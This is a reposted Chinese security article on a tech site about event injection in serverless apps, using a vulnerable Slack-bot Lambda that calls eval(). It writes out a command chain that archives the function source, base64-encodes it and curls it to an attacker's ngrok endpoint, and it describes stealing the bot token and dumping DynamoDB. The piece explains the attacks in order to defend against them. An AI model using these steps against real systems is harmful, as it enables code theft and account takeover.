深入研究攻击Serverless环境下的应用 SLS-1: 事件注入

栏目: 后端 · 发布时间: 5年前

内容简介:OWASP已经推出了一个新项目:即将发布的Serverless Top 10报告将研究运用历年

深入研究攻击Serverless环境下的应用 SLS-1: 事件注入

OWASP项目介绍

OWASP已经推出了一个新项目: Serverless Top 10 Project (OWASP无服务器 Top10)。此项目的目的是向安全从业者及组织科普常见的Serverless应用存在的安全漏洞,同时也提供识别和防范的基础技术。通过公开募集,这个项目将收集分析相关行业真实的数据输入,并计划于2019年第二季度正式发布报告。

即将发布的Serverless Top 10报告将研究运用历年 OWASP Top 10 中的技术攻击运行在Serverless状态中的应用,解释并举例针对Serverless应用时的攻击向量,防御技术和业务影响与传统应用之间差异。

自述

本文是Serverless系列的第一篇。这里,我将会使用大家熟知的传统攻击方式,探索处理Serverless应用时的新向量。从攻与防两面向大家展示新的技术。

这篇文章讨论的是有着多种变化攻击方式,最令人担忧的 注入攻击

对于 黑客 来说,SQL注入,操作系统命令注入,代码注入等攻击方式一直是他们的最爱,因为它们通常以一个完美的方式结束,获取黑客们想要的东西。对于“ 白帽子 ”来说有些不同。我们很重视这些漏洞,会尽一切努力防止它们发生。对于上述漏洞,经过二十多年有针对性的防御措施的开发,我们依然能够听到某个糟糕的网站,允许黑客注入恶意代码,然后以成千上万的网站用户信息泄露和一个官方道歉草草了事。所以,我们永远不知道如何学习。

坏消息,防御针对Serverless应用的注入攻击攻击比传统应用更难。对于传统应用程序来说,注入类漏洞的发生有相同的原因:应用轻易相信了用户的输入,然后将数据通过”The Network”交给程序内部某个功能处理。

深入研究攻击Serverless环境下的应用 SLS-1: 事件注入

对于处于Serverless环境应用, 发生注入类漏洞也有着类似的原因,但是其中”The Network”更加复杂。通常来说触发事件,Serverless应用才会运行。事件可以是应用的基础服务提供商提供的任意服务,如云储存,电子邮件,提醒功能等。

深入研究攻击Serverless环境下的应用 SLS-1: 事件注入

所以,为了防止漏洞,编写安全可靠的应用代码不再是我们唯一要做的,我们还要保护”The Network”的边界。例如,在接收电子邮件到触发应用某个功能之间安装防火墙。我们不知道我们的应用的基础服务提供商提供的服务的代码是否可靠。构成基础服务的代码,如果存在漏洞,并造成注入攻击,那么在Serverless应用的世界,叫做事件注入。

例子

深入研究攻击Serverless环境下的应用 SLS-1: 事件注入

一个简单的Serverless应用(自动回复机器人)的场景:

  1. 用户进入Slack chat-bot聊天频道
  2. 用户发送消息给Slack后端
  3. Slack后端自动将消息发送到组织API的网关
  4. 这个请求通过事件触发一组Lambda函数
  5. 其中一个lambda函数将消息写入DynamoDB某个表中
  6. 程序将自动回复内容发送到Slack后端
  7. 在这个设计好的频道里,Slack 会发出什么请求?

在本例中,因为通过Slack事件触发的Lambda函数容易受到代码注入的影响,所以可能存在事件注入。在 AWS云 上,大多数功能是通过动态语言(即 Python 或NodeJS)来实现,所以代码有被篡改的风险。RCE Style

深入研究攻击Serverless环境下的应用 SLS-1: 事件注入

在上面的代码中,我们能看到用了 eval() 函数来解析JSON数据,我们都知道应该避免它。然而,这只是一个,还有很多危险函数有相同的效果。

使用curl或者其他 工具 验证目标Serverless应用存在注入漏洞后,黑客可以开始做一些其他的事情。是的,对于Serverless环境下,黑客对于大部文件都没兴趣,包括/etc/passwd。这些文件属于云端环境容器,并且大多数对应用本身没有多大影响。但是还有其他的地方具有攻击价值。例如,攻击者可以通过注入以下Payload来盗取整个应用的代码:

深入研究攻击Serverless环境下的应用 SLS-1: 事件注入

简略分析: _ND_FUNC_ 是一种代码模式用来定义函数。由于是NodeJS环境,可以使用 ("child_process").exec() 开展一个新进程。通过这种方式,黑客能够执行任意代码。不用进入 AWS Lambda 内部,当启动NodeJS时,可以在容器里上寻找到源码。So, 黑客可以简单的将源码压缩到/tmp (具有写入权限),使用base64编码并发送到ngrok: tar -pcvzf /tmp/source.tar.gz ./; b=`base64 –wrap=0 /tmp/source.tar.gz`; curl -X POST $l4 –data $b.

结果?

不超过一分钟就可以从那里获取整个功能代码:

深入研究攻击Serverless环境下的应用 SLS-1: 事件注入

解压

深入研究攻击Serverless环境下的应用 SLS-1: 事件注入

查看源码,可以在阶段 #6中看到Slack的请求:

深入研究攻击Serverless环境下的应用 SLS-1: 事件注入

即使黑客无法从上述代码中读取环境变量,还是可以简单利用,因为它们属于环境本身。

黑客可以注入特定的代码来更改机器人。下面的示例中,我们可以看到攻击者通过恶意代码修改了机器人的头像,并输出最初的 ICON_URL (不言而喻,窃取 BOT_TOKEN 可以接管Slack帐户):

深入研究攻击Serverless环境下的应用 SLS-1: 事件注入

黑客也可以注入包含APIs(AWS-SDK)的代码。使用这类APIs代码允许黑客获得更多权限。例如,因为存在漏洞的函数可以读取某个DynamoDB表,黑客可以使用包含 DynamoDB.DocumentClient.scan() 函数的特定代码检测这个表中已有的数据,利用Slack聊天通道发布检索到的数据:

深入研究攻击Serverless环境下的应用 SLS-1: 事件注入

通过机器人聊天通道攻击Serverless应用只是一种新攻击向量。类似的攻击还可以通过电子邮件(主题,附件或Header),MQTT发布/订阅消息,云存储事件(文件上载/下载等),查询,日志,文件上传或其他事件来进行。

这种攻击的影响和传统应用不同。因为没有服务器,所以没有服务器接管。在我们的示例中,攻击者能够读取源码代码,定义函数,查询数据库信息并接管机器人帐户,甚至可以接管云账户,这取决于存在漏洞的服务的权限。只要存在漏洞服务能够访问的,黑客都可以注入特定代码获得他们想要的。

深入研究攻击Serverless环境下的应用 SLS-1: 事件注入

如果你想观看演示视频, 这里有

那么,我们该如何对抗这种攻击?好吧,不是所有的都要改变。很多保护传统应用程序的方法也对Serverless应用也有效。为了减少攻击的发生,做到以下几点:永远不要相信用户的输入,使用安全的API,最小权限原则。很重要的一点,程序员应该接受编写安全代码的培训。没有其他好办法了。

作为人类,我们容易出错。所以,我们试着去找到一种自动化的脚本去阻止我们犯错。但是,如果没有,我们该怎么办呢?

Serverless应用的防御措施应该是基于Serverless它本身的。否则,就失去了使用Servless的价值。, 推特上一个聪明的家伙曾经说过 ,就像我们不会用剑来保护我们的宇宙飞船一样,我们也不能用旧技术来保护宇宙。Serverless应用的防御应该是瞬息的,与它所保护的代码共生死。

小结

我们讨论了Serverless注入攻击与传统攻击不同的方面:不同类型的输入源,动态语言的种类,以及环境中的有无价值的文件。还有其他差异,例如,Serverless应用的服务只会短暂的运行。在这种环境下黑客如何攻击?正常的攻击是当函数成功运行完毕时结束。黑客可能要重复地发动攻击,这样又有可能引起警觉。还有其他方法可以实现持续化。如简单地 保持容器 “warm” 确保应用继续运行,这意味着黑客要定期地触发某个事件。另一种方法是通过注入Payload来修改程序源代码,使得应用会一直运行。


以上所述就是小编给大家介绍的《深入研究攻击Serverless环境下的应用 SLS-1: 事件注入》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

用户故事地图

用户故事地图

Jeff Patton / 李涛、向振东 / 清华大学出版社 / 2016-4-1 / 59.00元

用户故事地图作为一种有效的需求工具,越来越广泛地应用于开发实践中。本书以用户故事地图为主题,强调以合作沟通的方式来全面理解用户需求,涉及的主题包括怎么以故事地图的方式来讲用户需求,如何分解和优化需求,如果通过团队协同工作的方式来积极吸取经验教训,从中洞察用户的需求,开发真正有价值的、小而美的产品和服务。本书适合产品经理、用户体验设计师、产品负责人、业务分析师、IT项目经理、敏捷教练和精益教练阅读和......一起来看看 《用户故事地图》 这本书的介绍吧!

HTML 压缩/解压工具
HTML 压缩/解压工具

在线压缩/解压 HTML 代码

MD5 加密
MD5 加密

MD5 加密工具

正则表达式在线测试
正则表达式在线测试

正则表达式在线测试